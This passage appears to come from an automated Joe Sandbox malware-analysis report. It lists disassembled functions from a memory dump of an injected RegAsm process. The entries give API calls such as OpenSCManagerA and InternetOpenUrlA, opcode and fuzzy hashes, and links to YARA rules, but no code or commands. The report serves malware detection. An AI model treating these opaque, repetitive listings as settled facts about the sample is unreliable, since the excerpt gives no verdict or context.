Instruction Fuzzy Hash: 2751FD2060E20ADEFF76AA2CC49CBB977AAAB1332CF550DD6D40697C52C32C9485C753

Uniqueness

Uniqueness Score: -1.00%

Function 01378B22, Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 867b023a9ad259e93af2c611f152e8fbe9c3825f8a864e70f463f978825b944b
Instruction ID: 3019635261c40e843853504f18bfaebc600d7b2d561f78950385d310e4ab9e24
Opcode Fuzzy Hash: 867b023a9ad259e93af2c611f152e8fbe9c3825f8a864e70f463f978825b944b
Instruction Fuzzy Hash: 5E51EF6060E24ADEFF72EA6CC44CBB97BA5AB1322CF590CDAD44697852C32C9485C712

Uniqueness

Uniqueness Score: -1.00%

Function 013788F9, Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a848a032e4fdf66bcf5d794ff1e365c5bba9b4c6b84f0b5891ac26fc78d5d1e5
Instruction ID: 7c8102a1abcc9ab771cb496a39fd65911cc2208c7e745abfa4c297668f9358cf
Opcode Fuzzy Hash: a848a032e4fdf66bcf5d794ff1e365c5bba9b4c6b84f0b5891ac26fc78d5d1e5
Instruction Fuzzy Hash: 9C41CD2060D24ADEFF36AA28845C7B87BA5AF1231DF5909DAC4069BC52C32D84C5C753

Uniqueness

Uniqueness Score: -1.00%

Function 01378B72, Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 8670c0fd5522d90d776976314181250afb3b7815613e5a94898e327938f0e8eb
Instruction ID: 7d27019e70d8e3622a5bef97620d4fb8f7a9367b234bf4f58a1adb245140ba44
Opcode Fuzzy Hash: 8670c0fd5522d90d776976314181250afb3b7815613e5a94898e327938f0e8eb
Instruction Fuzzy Hash: 1951D02060E289EEFF32EB6C844CBB97B96AF1321CF590CC9D44687823C3699485C712

Uniqueness

Uniqueness Score: -1.00%

Function 01378AAE, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c8e9806a67c63cbabd00efc0944ff7e0275210c4fbb7acdd21044dfe854f69b1
Instruction ID: 1abeddfff7e058e78ad1353759c54e9e282774b9d79ffd58b105aafc6f0f1ca2
Opcode Fuzzy Hash: c8e9806a67c63cbabd00efc0944ff7e0275210c4fbb7acdd21044dfe854f69b1
Instruction Fuzzy Hash: 5341F02060D24ADEFF72AA2CC44CBB977A6AB1332CF551CDAD44697862C32DA480C752

Uniqueness

Uniqueness Score: -1.00%

Function 01378ADE, Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 6a24290dc696c96bb1f760320150260715c14d2f4e639b689c5e969a91e97ba7
Instruction ID: ce6cb300cf2f3d2eb69845e9e3b0dad2beff4c2c48489e9141281a57b37507fc
Opcode Fuzzy Hash: 6a24290dc696c96bb1f760320150260715c14d2f4e639b689c5e969a91e97ba7
Instruction Fuzzy Hash: 8241CD2060A28ADEFF32FB6C844CBB97B95AB1321CF591CDAD44687C62C36D9485C712

Uniqueness

Uniqueness Score: -1.00%

Function 01378D6A, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1c62894302ee11bd1a9982052c0677289e79858c7ad4c88f7a34d90839f9066c
Instruction ID: 29f7d44c65b76aabcbe20d8ac51825323692d025caedf8edaeb3405e4d56a2da
Opcode Fuzzy Hash: 1c62894302ee11bd1a9982052c0677289e79858c7ad4c88f7a34d90839f9066c
Instruction Fuzzy Hash: 4941AF2020E3C5AFFB33FF6D9588CA57BD69A17558B490CC9E48297927C329A814D706

Uniqueness

Uniqueness Score: -1.00%

Function 01378A7F, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b42d170a2eb4a3527f45a44c774b44d885e585967e925f89d34137096e93497f
Instruction ID: 83b55782ad8be8f0b5952ac645e136d58b055615a3fb428deaaab3b021dd1c2c
Opcode Fuzzy Hash: b42d170a2eb4a3527f45a44c774b44d885e585967e925f89d34137096e93497f
Instruction Fuzzy Hash: 0441012020E24ADEFF32AA2CC45CBB977A6AB2631DF551CD6D44697D52C37C94C0CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0137468F, Relevance: 1.6, APIs: 1, Instructions: 128libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 013747CE: InternetOpenA.WININET(01374FD3,00000000,00000000,00000000,00000000,01371D72,?,00000000,?,00000050,00000315,?,?,?,?), ref: 013747DF
Part of subcall function 013747CE: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$InitializeThunk
String ID:
API String ID: 518753361-0
Opcode ID: 0fd57022c8de2ae2ae15a53a78d9ee0e220c47c54f099499840d74141f179336
Instruction ID: e16e359bb6c499c7ac46bca5be12de83b71f9f0d9ba3ea5456a16db156504f7b
Opcode Fuzzy Hash: 0fd57022c8de2ae2ae15a53a78d9ee0e220c47c54f099499840d74141f179336
Instruction Fuzzy Hash: 1641643020A3CA8FDB31EF6889917DA3FA2BF57204F54844DC8821F552C739A802CB96

Uniqueness

Uniqueness Score: -1.00%

Function 013746AE, Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c9c49358191f49d45bc6a8a52104747d811802eadcef95c8763313f8d7e531
Instruction ID: e23431ef4378da59e3d85b7facab273041183831a9a0b8578bd721933f23f38f
Opcode Fuzzy Hash: 44c9c49358191f49d45bc6a8a52104747d811802eadcef95c8763313f8d7e531
Instruction Fuzzy Hash: 4D41473020A3C9DFDB32EF7889517D63FA2BF57248F55848CC8825B512C739A402CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0137474E, Relevance: 1.6, APIs: 1, Instructions: 120libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c70b537b4546a11067bc4c11ede192094ad27192754d7054814a0605c95625c4
Instruction ID: 9af4a0026740cdbec598a7225f1a4bd4a28ebafe7ebcc410316cf1770c40642b
Opcode Fuzzy Hash: c70b537b4546a11067bc4c11ede192094ad27192754d7054814a0605c95625c4
Instruction Fuzzy Hash: 4641133020A3C99FEB32EF788865BD67FA1BF07248F48888DC4815B553C779A405CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01374702, Relevance: 1.6, APIs: 1, Instructions: 118libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 036c22ee4d1c6f02bb47f3beaf381c143ba883c9525622e60e4ec866ba4d12e5
Instruction ID: 175894e00a3a0c5000ade30dea1ecb46570fb9919edb3e497bae3cf80da50e0c
Opcode Fuzzy Hash: 036c22ee4d1c6f02bb47f3beaf381c143ba883c9525622e60e4ec866ba4d12e5
Instruction Fuzzy Hash: 9F41343020A3C99FDB32EF788854BC67FA1BF57244F45888DC8825B513C739A801CB56

Uniqueness

Uniqueness Score: -1.00%

Function 01378E82, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91247ff59a2bdc30d8ba5f27ecff8085189358d1a2a2d738b63507b4b0266efd
Instruction ID: 7b90491542d6c7dde787a5853bdae474655d7a1352e49f20a0047712e1c93839
Opcode Fuzzy Hash: 91247ff59a2bdc30d8ba5f27ecff8085189358d1a2a2d738b63507b4b0266efd
Instruction Fuzzy Hash: 2A41CE2130E385AFFB33FF6CC548DA67BE6AA17658B580CC9E48297817C329B801D715

Uniqueness

Uniqueness Score: -1.00%

Function 01378CB1, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 719e63f941de513f512367438cebde27e953f0e150da666dd3e22f299c0d8569
Instruction ID: dbb0d895f6285197ebcd3684a1997c40a248a6e7aa6915e5f2ca5db72bc4b190
Opcode Fuzzy Hash: 719e63f941de513f512367438cebde27e953f0e150da666dd3e22f299c0d8569
Instruction Fuzzy Hash: A541C52060E386DFFF37EA2C858CAA57BE59F1325CB580CC5D48697923C329A445C752

Uniqueness

Uniqueness Score: -1.00%

Function 01374876, Relevance: 1.6, APIs: 1, Instructions: 116networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: e8cd5bb889e6e796f179b28f703731a81c63d8daae3803f805a67a947f17ce67
Instruction ID: 133c7f0c90bff8be1d6ef45f62eaeff1f132d651ee95f474e7495b3a2393f740
Opcode Fuzzy Hash: e8cd5bb889e6e796f179b28f703731a81c63d8daae3803f805a67a947f17ce67
Instruction Fuzzy Hash: BC41D23020938AEBEB31EE6CDD40FEA3B99AB07648F014814EC96D7842D735B801DB21

Uniqueness

Uniqueness Score: -1.00%

Function 013762CA, Relevance: 1.6, APIs: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,01376439), ref: 01376404

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a857edf3ef15ca16de027dc6aac024342981ebb791fc8a4d76c7964ca6a00bcc
Instruction ID: 9170db21bb716a9b94546b9199b77d9b56f46ce244a817e68db2171a15eba7ad
Opcode Fuzzy Hash: a857edf3ef15ca16de027dc6aac024342981ebb791fc8a4d76c7964ca6a00bcc
Instruction Fuzzy Hash: 5A31E6D020DA95ABFF73FB7D8962EF93B959B0355CF440C59E88293817C75DA4048B02

Uniqueness

Uniqueness Score: -1.00%

Function 01374CEA, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b5205f3fc9b162eb5587572d2813c56fdff97bb726b7cfaedef3a125fb2a9a1
Instruction ID: b6e99034b58bb2d3d6fb41955d48a65b4217d0cb9ec35ffcd0dbf425eba7c0e7
Opcode Fuzzy Hash: 9b5205f3fc9b162eb5587572d2813c56fdff97bb726b7cfaedef3a125fb2a9a1
Instruction Fuzzy Hash: 294128B060934B8FDB32EF6D84617DA3BA6AF6A294F108049DC418B751DB34D811CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01378B44, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 077875274481c2484e776ed376abbba648c665a820830c1447a227194a01f13e
Instruction ID: d57ab51686bc8a994daf6c7a60c0b663e135e9675018a6386ceefd8bbdafd38d
Opcode Fuzzy Hash: 077875274481c2484e776ed376abbba648c665a820830c1447a227194a01f13e
Instruction Fuzzy Hash: 7E41CE2060D24ADEFF36AB28845CBB97BA6AF1322CF590CDAD40647C62C36D8484C752

Uniqueness

Uniqueness Score: -1.00%

Function 01374D3A, Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68744d18d92f7fdd53dc5ccb8ef68ded6f49a8fde4db1ee517d5ccd37f5a2ca6
Instruction ID: 886843edcc26a9fa7bb1e5fa78050b0476568ce4c39a706d8c107367da5b501e
Opcode Fuzzy Hash: 68744d18d92f7fdd53dc5ccb8ef68ded6f49a8fde4db1ee517d5ccd37f5a2ca6
Instruction Fuzzy Hash: 33415BB070934A8FDB32EF6D84617CA3BA2BFAA258F108059DC4587756DB34E811CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013748C6, Relevance: 1.6, APIs: 1, Instructions: 109networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: fb1e77d0fb1e6654818f242ef4c5c08ea7c232b063c54fd10ab57f4c8ef4f571
Instruction ID: 2eb096f76af2c5b78237225dfdb20811d0ee3c227a99a52a8de066a6d09dd413
Opcode Fuzzy Hash: fb1e77d0fb1e6654818f242ef4c5c08ea7c232b063c54fd10ab57f4c8ef4f571
Instruction Fuzzy Hash: D541B46124A3CAAFEB32DF68DC50BE93FA89F07244F050896D885DB453D625A904CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0137484A, Relevance: 1.6, APIs: 1, Instructions: 105networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,?,?,?,?), ref: 013748B0

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 94d56d9bad0b62cffde2371ef218da7edf93de481de10a0d210dda79c4ac04e5
Instruction ID: f5916afd4528dceec154c1bbde94d7ce27cdaf868b45beed1a493ddaea8331bf
Opcode Fuzzy Hash: 94d56d9bad0b62cffde2371ef218da7edf93de481de10a0d210dda79c4ac04e5
Instruction Fuzzy Hash: 4331E5302483CABFEB319E68CC50BE93BA89F07648F154455ED8A9B892D735B941DB21

Uniqueness

Uniqueness Score: -1.00%

Function 01374E1E, Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28ca68917899de0ad66ce89b4b61d934dca5760cfc63a90915bb38b76bbd8cb7
Instruction ID: 708e1414b5246708349c0853b93c2fa5ef483150714b11e84da6a32ca693eac3
Opcode Fuzzy Hash: 28ca68917899de0ad66ce89b4b61d934dca5760cfc63a90915bb38b76bbd8cb7
Instruction Fuzzy Hash: B731597020A38ADFEB23EFAD8441ADA3FD66F56258F104449D8418B613C734F811CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013789FF, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b1f8d4c89c1d209859319673815c2beaca17e1b70c4f6a158c6d30753369e51d
Instruction ID: f60f4650bfc1eb703a8198dd342029a2944a2449e816a206b2da3cada7ff27a8
Opcode Fuzzy Hash: b1f8d4c89c1d209859319673815c2beaca17e1b70c4f6a158c6d30753369e51d
Instruction Fuzzy Hash: D931E02060820ECEFF369A28C46C7B86666AF6131DF9919EBC50B56DA1C37C84C5CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01378A26, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 947f33cff946bba6ad55f4c8b331ef73dddaeec728fd33c421209cd0a56ca44f
Instruction ID: f3d83c0b0dd94c59a4c7731d32717d84209a4d88cb4605afe48604c6a1188f4c
Opcode Fuzzy Hash: 947f33cff946bba6ad55f4c8b331ef73dddaeec728fd33c421209cd0a56ca44f
Instruction Fuzzy Hash: 5731012060860ECEFF359A28C46C7B8766AAF2131DF9919DBC50B56DA1C37C84C4CB53

Uniqueness

Uniqueness Score: -1.00%

Function 0137479E, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(B800001B,?,01371D72,?,00000000,?,00000050,00000315,?,?,?,?,?,?,013750F2,?), ref: 01375073

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33509a82c8528118c30eb5c988b0b1b0f16cae9a45060f80fd400ca9d1df4665
Instruction ID: 27f443d01cef2b05c9a15bb0b62a7ce338f7f72516f77a7cd827ef34508e5e6f
Opcode Fuzzy Hash: 33509a82c8528118c30eb5c988b0b1b0f16cae9a45060f80fd400ca9d1df4665
Instruction Fuzzy Hash: D931023120E3D59BDB23EFB88455A927FE5BB03108B19888DD4825B413C369B415D796

Uniqueness

Uniqueness Score: -1.00%

Function 01378BCC, Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: f973a7ec10696219a000e97fed3d97eb7517c775465869f94b32d4396bc6a617
Instruction ID: efad61ad4e2d915046755b8f0661383d4636a088e07cecc41be2a26f58268a4b
Opcode Fuzzy Hash: f973a7ec10696219a000e97fed3d97eb7517c775465869f94b32d4396bc6a617
Instruction Fuzzy Hash: D231E12060920ADEFF36AB2CC41CBB9B7A6AF2232DF581DC6C40647C62C32D94C5C752

Uniqueness

Uniqueness Score: -1.00%

Function 01377665, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3536beb867e8d07c386686d16264558c6b6f460ecd518b64ef70871c3e854bb0
Instruction ID: 6acf1a8bbba1a99eccfd9f546653e24791ed4dbb3c82d6ef575c690be2d35cf2
Opcode Fuzzy Hash: 3536beb867e8d07c386686d16264558c6b6f460ecd518b64ef70871c3e854bb0
Instruction Fuzzy Hash: 422187E0108A5EE6FE3526788A7B7FE711E9F522BCF60013AED53A2C95DB6C8040C553

Uniqueness

Uniqueness Score: -1.00%

Function 01378C71, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: e044a099de0dca171987ed3a1cf3ff872bb9e1fda5f100d21b1c4f38390e14b0
Instruction ID: c90ea8ffec982d39cbf42c9f8f3473c9cf6b050ccf0508e4f696fa63845862e9
Opcode Fuzzy Hash: e044a099de0dca171987ed3a1cf3ff872bb9e1fda5f100d21b1c4f38390e14b0
Instruction Fuzzy Hash: E331A12060E386DEFF36EA2C855CBA5BBA59F1321CF590CC6D4464B923C3299484C752

Uniqueness

Uniqueness Score: -1.00%

Function 01378D1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 11c3083dc88ca23ddfacc51e6738399b142ffd57f0ca098cfd921cc0436bd413
Instruction ID: 7a99f5a29db81bff9d88490af49b77b2ded54e35d366fe9bf60dd246d9184493
Opcode Fuzzy Hash: 11c3083dc88ca23ddfacc51e6738399b142ffd57f0ca098cfd921cc0436bd413
Instruction Fuzzy Hash: 6A21D12020E286DEFF37FA7C855C9F57BD69A1365C7881CC5D48297E26C3296485C712

Uniqueness

Uniqueness Score: -1.00%

Function 013700EC, Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1370000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6fc16e36f3d783b7f61d4c66cbbfdda3473258ba0a23c60ee831e1a7e63b3c
Instruction ID: e59c9b291969a62e21e9079f53faa6184441f3eb8f8a8bdbce9ca62fe26ccc74
Opcode Fuzzy Hash: 2c6fc16e36f3d783b7f61d4c66cbbfdda3473258ba0a23c60ee831e1a7e63b3c
Instruction Fuzzy Hash: 5B1159C454CE1EE1FF3A296886B33FA115E4F5329CF84052AFD9323816874D80488553

Uniqueness

Uniqueness Score: -1.00%

Function 01378B09, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,013750F2,?,013730F2,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 01378E3B

Memory Dump Source

Source File: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

